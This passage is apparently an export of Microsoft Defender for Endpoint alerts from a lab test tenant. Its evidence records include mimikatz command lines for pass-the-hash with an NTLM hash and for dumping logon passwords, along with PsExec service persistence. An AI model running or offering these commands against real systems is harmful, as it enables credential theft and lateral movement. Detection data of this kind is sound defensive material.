"sha256": "e12d110a9b4837e7495dee781e0ea9b3b753dd2ded7ff0576f7479234d4322da",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:23:43.0433333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait",
"processCreationTime": "2022-11-21T02:22:00.8662295Z",
"processId": 8868,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:25:43.57Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait",
"processCreationTime": "2022-11-21T02:24:23.5089774Z",
"processId": 7660,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:25:44.0366667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait",
"processCreationTime": "2022-11-21T02:23:51.0663034Z",
"processId": 9244,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:32:39.8633333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait",
"processCreationTime": "2022-11-21T02:30:58.325205Z",
"processId": 1884,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:34:51.16Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait",
"processCreationTime": "2022-11-21T02:32:59.2288177Z",
"processId": 7708,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-09-30T06:20:01.6733333Z
|
Suspicious
|
Active
|
hacker
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
|
70df765f554ed7392200422c18776b8992c09231
|
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
|
mimikatz.exe
|
C:\M365DAttack\Mimikatz\x64
| 2,596
|
"mimikatz.exe" privilege::debug sekurlsa::logonpasswords exit
|
2022-09-30T06:11:52.7127433Z
| 4,064
|
2022-09-30T06:11:13.210308Z
|
powershell.exe
|
\Device\HarddiskVolume4\Windows\System32\WindowsPowerShell\v1.0
|
Detected
|
c7e147cb0eb3534a4dcea5acb8e61c933713b145
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-18T04:44:34.5966667Z
|
Suspicious
|
None
|
Takeshi
|
TMTOWER-BOOK
|
S-1-5-21-7316772-2057538409-3008203053-1001
| null | null |
9678ea8069d9812cda2a41c9d3dc32d5c4555b7b
|
529ee9d30eef7e331b24e66d68205ab4554b6eb3487193d53ed3a840ca7dde5d
|
powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0
| 14,616
|
powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Import-Module 'c:\Users\Takeshi\.vscode\extensions\ms-vscode.powershell-2022.8.5\modules\PowerShellEditorServices\PowerShellEditorServices.psd1'; Start-EditorServices -HostName 'Visual Studio Code Host' -HostProfileId 'Microsoft.VSCode' -HostVersion '2022.8.5' -AdditionalModules @('PowerShellEditorServices.VSCode') -BundledModulesPath 'c:\Users\Takeshi\.vscode\extensions\ms-vscode.powershell-2022.8.5\modules' -EnableConsoleRepl -StartupBanner \"PowerShell Extension v2022.8.5
Copyright (c) Microsoft Corporation.
https://aka.ms/vscode-powershell
Type 'help' to get help.
\" -LogLevel 'Normal' -LogPath 'c:\Users\Takeshi\AppData\Roaming\Code\User\globalStorage\ms-vscode.powershell\logs\1668400572-3c88b720-7963-4dd6-aba1-3456f669fe051668400566006\EditorServices.log' -SessionDetailsPath 'c:\Users\Takeshi\AppData\Roaming\Code\User\globalStorage\ms-vscode.powershell\sessions\PSES-VSCode-11004-905307.json' -FeatureFlags @() "
|
2022-11-14T04:36:16.5242809Z
| 12,136
|
2022-11-14T04:36:09.1457881Z
|
Code.exe
|
\Device\HarddiskVolume3\Users\Takeshi\AppData\Local\Programs\Microsoft VS Code
|
Detected
|
83b06aa80899050e5d4132992e36b5b8f14b64e9
|
da638072963679110202_1965280652
|
7b890db4-84dd-4df4-bace-1fc396a2f272
| 975
|
MicrosoftDefenderForEndpoint
|
2022-12-22T08:59:27.9110406Z
|
2022-12-22T09:10:42.2666667Z
| null |
2022-12-22T08:26:26.4888159Z
|
2022-12-22T09:08:59.147227Z
|
Suspicious System Owner/User Discovery
|
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
|
Discovery
|
New
|
Low
| null |
UnsupportedAlertType
| null | null |
WindowsDefenderAtp
|
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
| null | null | null |
[
"T1033",
"T1059.001",
"T1087.001"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv8-win10v.msdxv8.m365dpoc.com",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Medium",
"tags": [],
"version": "1809",
"vmMetadata": null
}
] |
[
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:59:27.94Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:59:27.94Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:26:24.0772409Z",
"parentProcessFileName": "explorer.exe",
"parentProcessFilePath": "C:\\Windows",
"parentProcessId": 1896,
"processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Desktop'",
"processCreationTime": "2022-12-22T08:47:11.8139068Z",
"processId": 6324,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:59:27.94Z",
"fileName": "explorer.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:26:23.9030784Z",
"parentProcessFileName": "userinit.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 2796,
"processCommandLine": "Explorer.EXE",
"processCreationTime": "2022-12-22T08:26:24.0772409Z",
"processId": 1896,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d",
"sha256": "8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T09:10:42.1633333Z",
"fileName": "powershell_ise.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T09:05:20.1978737Z",
"parentProcessFileName": "explorer.exe",
"parentProcessFilePath": "C:\\Windows",
"parentProcessId": 2980,
"processCommandLine": "\"PowerShell_ISE.exe\" ",
"processCreationTime": "2022-12-22T09:07:41.4690585Z",
"processId": 5408,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "044ca0fecf2436aac3f9e7acc3c97b30588c594d",
"sha256": "77b4c0f9929073ce132223f3169349f3e7a626c392b7dbc1a39fa89265c2c6bf",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T09:10:42.1633333Z",
"fileName": "explorer.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T09:05:20.1342689Z",
"parentProcessFileName": "userinit.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 4992,
"processCommandLine": "Explorer.EXE",
"processCreationTime": "2022-12-22T09:05:20.1978737Z",
"processId": 2980,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d",
"sha256": "8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-14T14:56:38.95Z
|
Suspicious
|
None
|
darol
|
rnd.local
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-14T17:44:25.91Z
|
Suspicious
|
None
|
darol
|
lab.net
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-14T07:33:30.1733333Z
|
Benign
|
None
|
darol
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-14T14:23:29.45Z
|
Suspicious
|
None
|
guest
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-16T09:09:13.3533333Z
|
Malicious
|
None
|
SYSTEM
|
NT AUTHORITY
|
S-1-5-18
| null | null |
044a0cf1f6bc478a7172bf207eef1e201a18ba02
|
ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436
|
powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0
| 3,764
|
powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command "& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\AntiVirus.psm1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\AntiVirus.psm1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '1c0f9c9177787b3146332dd0f112444d3062214f6e71e1a4bc16b1fb55818a86')) { exit 323;};$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\EDR.psm1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\EDR.psm1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'f84b9499bd9dc40b993886d328828a2ed82541e54b76f9cb9e04c007eb97d8be')) { exit 323;};$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\Firewall.psm1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\Firewall.psm1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '2490d8e22c01e09f99c8e32a044d6c150e75e8e75028809f73fffd9d3bf4ed92')) { exit 323;};$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\GroupPolicyObject.psm1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\GroupPolicyObject.psm1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '5b251a22c68070bcb6be4c85e71232067581fa1483ce767e2e9fbe98a4db0229')) { exit 323;};$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\PolicyEnforcer.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\PolicyEnforcer.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '13ff49e1e4a5017ae784cbe39648f9f18af975c2ce9616d52d7d7b32bec05e50')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\PolicyEnforcer.ps1' }"
|
2022-11-16T09:06:26.1426374Z
| 1,748
|
2022-11-16T09:06:24.6563216Z
|
SenseCM.exe
|
C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\10.8210.22621.1011
|
Detected
|
7114973b832b32d349815a5d2811738cc10fa650
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-14T15:51:40.19Z
|
Malicious
|
None
|
darol
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-22T08:59:19.0966667Z
|
Malicious
|
None
|
jeff
|
MSDXV8
|
S-1-5-21-2159906967-4174806019-1002223092-1104
| null |
jeff@msdxv8.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072963025498866_-272179420
|
012cce8a-ab09-41a3-8eca-9bedf0a2c27b
| 975
|
MicrosoftDefenderForEndpoint
|
2022-12-22T08:58:22.5499055Z
|
2022-12-22T08:59:28.19Z
| null |
2022-12-22T08:47:29.8275995Z
|
2022-12-22T08:47:50.8614648Z
|
Suspicious file registered as a service
|
A file with suspicious attributes or involved in possible breach activity was registered as a service. An attacker might be attempting to register the file as a service for persistence.
|
Persistence
|
New
|
Medium
| 62
|
PendingApproval
| null | null |
WindowsDefenderAtp
|
d15c9f84-aabc-46e5-a92e-7bb3ce5eceda
| null | null | null |
[
"T1021.002",
"T1074.002",
"T1543.003",
"T1569.002",
"T1570"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv8-win10b.msdxv8.m365dpoc.com",
"firstSeen": "2022-12-08T01:04:21.9057174Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Critical",
"tags": [],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV8/providers/Microsoft.Compute/virtualMachines/MSDXV8-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "97e5e58b-3d5e-4bfe-8e40-a88b49deff08"
}
}
] |
[
{
"aadUserId": null,
"accountName": "LocalSystem",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:58:22.5733333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "ronhd",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:58:22.5733333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1111",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-22T08:58:22.5733333Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "NotFound",
"remediationStatusDetails": "The system cannot find the file specified.,The system cannot find the file specified.",
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-12-22T08:50:36.15Z
|
Suspicious
|
None
|
jeff
|
MSDXV8
|
S-1-5-21-2159906967-4174806019-1002223092-1104
| null |
jeff@msdxv8.m365dpoc.com
|
4f4970c3545972fea2bc1984d597fc810e6321e0
|
25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369
|
net.exe
|
C:\Windows\System32
| 2,936
|
dir C:\
|
2022-12-22T08:47:23.1029019Z
| 6,324
|
2022-12-22T08:47:11.8139068Z
|
powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0
|
Detected
|
7ba8aa008687dd62d639cb45b52c7c9f971c65c1
|
da638045930214994785_-457461802
|
668b61a7-e884-4a59-b731-73ba0effcdec
| 765
|
MicrosoftDefenderForEndpoint
|
2022-11-21T02:03:41.4995013Z
|
2022-11-26T01:35:43.09Z
|
2022-11-21T03:45:17.4759763Z
|
2022-11-21T01:55:13.6153204Z
|
2022-11-21T02:30:59.1966323Z
|
Suspicious RDP session
|
A combination of several suspicious RDP session activities has been detected in this device. Attackers might be attempting to establish a foothold in the environment by using various reconnaissance and persistence methods, then evade detection by tampering with and turning off security features to complete their objectives.
|
SuspiciousActivity
|
Resolved
|
High
| 50
|
SuccessfullyRemediated
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
e3270960-77a9-4f2b-a6ba-ea6a9d5e86d8
|
msftadmin@msdxv2.m365dpoc.com
| null | null |
[
"T1003",
"T1021.001",
"T1555",
"T1558.003"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "corp.local",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "None",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": null,
"accountName": "MSDXV2-Win10V$",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV2",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:03:41.55Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
